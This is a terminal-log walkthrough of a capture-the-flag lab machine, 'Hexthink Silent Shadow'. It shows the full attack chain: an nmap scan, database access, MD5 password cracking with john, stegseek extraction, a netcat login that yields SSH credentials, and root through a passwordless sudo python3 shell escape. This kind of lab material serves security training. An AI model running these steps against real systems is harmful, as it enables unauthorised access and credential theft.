Thehackerslabs-Hexthink-Silent-Shadow

[root@kali] /home/kali/hexthink-silent-shadow  
❯ nmap 192.168.55.67 -sV -A -p-                                                                                                            
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4d:6e:39:a4:15:86:88:70:c7:9d:09:91:a3:0b:18:8c (ECDSA)
|_  256 f9:21:5d:25:ee:76:05:db:01:3b:45:c9:68:b0:82:9f (ED25519)
80/tcp   open  http        Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.58 (Ubuntu)
3306/tcp open  mysql       MariaDB 5.5.5-10.11.11
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.11.11-MariaDB-0ubuntu0.24.04.2
|   Thread ID: 34
|   Capabilities flags: 63486
|   Some Capabilities: LongColumnFlag, Support41Auth, Speaks41ProtocolOld, SupportsCompression, IgnoreSigpipes, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, InteractiveClient, FoundRows, ODBCClient, ConnectWithDatabase, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, SupportsTransactions, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: wPg7y~-c,O)~bPI]yfu:
|_  Auth Plugin Name: mysql_native_password
9090/tcp open  zeus-admin?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, SqueezeCenter_CLI, TLSSessionReq, TerminalServerCookie, WMSRequest, X11Probe, drda, ibm-db2-das, informix: 
|_    Protocolo incorrecto. Esto no es HTTP.

[root@kali] /home/kali/hexthink-silent-shadow  
❯ mysql -h 192.168.55.67 -u ctf_user -p                                                                                                       ⏎
Enter password: 
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

[root@kali] /home/kali/hexthink-silent-shadow  
❯ mysql -h 192.168.55.67 -u ctf_user -p --ssl=False                                                                                           ⏎
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 9589
Server version: 10.11.11-MariaDB-0ubuntu0.24.04.2 Ubuntu 24.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 

MariaDB [ctf_db]> select * from usuarios;
+---------+----------------------------------+
| login   | password                         |
+---------+----------------------------------+
| admin   | 21232f297a57a5a743894a0e4a801fc3 |
| admin   | 21232f297a57a5a743894a0e4a801fc3 |
| test    | 098f6bcd4621d373cade4e832627b4f6 |
| support | e99a18c428cb38d5f260853678922e03 |
| h4cker  | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+----------------------------------+
5 rows in set (0.001 sec)

[root@kali] /home/kali/hexthink-silent-shadow  
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt  --format=Raw-MD5 
Using default input encoding: UTF-8
Loaded 4 password hashes with no different salts (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
password         (h4cker)     
abc123           (support)     
admin            (admin)     
test             (test)     
4g 0:00:00:00 DONE (2025-05-31 05:13) 400.0g/s 16627Kp/s 16627Kc/s 18662KC/s tina00..tauruz
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed. 

[root@kali] /home/kali/hexthink-silent-shadow  
❯ mysql -h 192.168.55.67 -u ctf_user -p --ssl=False --batch --raw -e "SELECT imagen FROM ctf_db.noticias WHERE id=2" > imagen.jpg

Enter password: 

[root@kali] /home/kali/hexthink-silent-shadow  
❯ stegseek imagen.jpg  
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[!] error: the file format of the file "imagen.jpg" is not supported.

[root@kali] /home/kali/hexthink-silent-shadow  
❯ file imagen.jpg                                                                                                                             ⏎
imagen.jpg: data

[root@kali] /home/kali/hexthink-silent-shadow  
❯ tail -n +2 imagen.jpg > output.jpg && mv output.jpg imagen.jpg


[root@kali] /home/kali/hexthink-silent-shadow  
❯ file imagen.jpg 
imagen.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 0x0, segment length 16, baseline, precision 8, 800x600, components 1

[root@kali] /home/kali/hexthink-silent-shadow  
❯ stegseek imagen.jpg 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "hello"
[i] Original filename: "instrucciones.txt".
[i] Extracting to "imagen.jpg.out".


[root@kali] /home/kali/hexthink-silent-shadow  
❯ cat imagen.jpg.out  
Para continuar deberás abrir el Puerto 9090

Esto no es un escaneo Es un saludo

Envía la siguiente cadena al puerto 9090:

LOGIN whisper
KEY whisper9090

No lo hagas mal Solo hay una oportunidad

[root@kali] /home/kali/hexthink-silent-shadow  
❯ echo -e "LOGIN whisper\nKEY whisper9090" | nc 192.168.55.67 9090

Usuario SSH: whisper
Contraseña: 7h3m1nDf0x

whisper@server:~$ sudo -l
Matching Defaults entries for whisper on server:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User whisper may run the following commands on server:
    (ALL) NOPASSWD: /usr/bin/python3

whisper@server:~$ sudo /usr/bin/python3 -c 'import os;os.system("bash")'
root@server:/home/whisper# id
uid=0(root) gid=0(root) groups=0(root)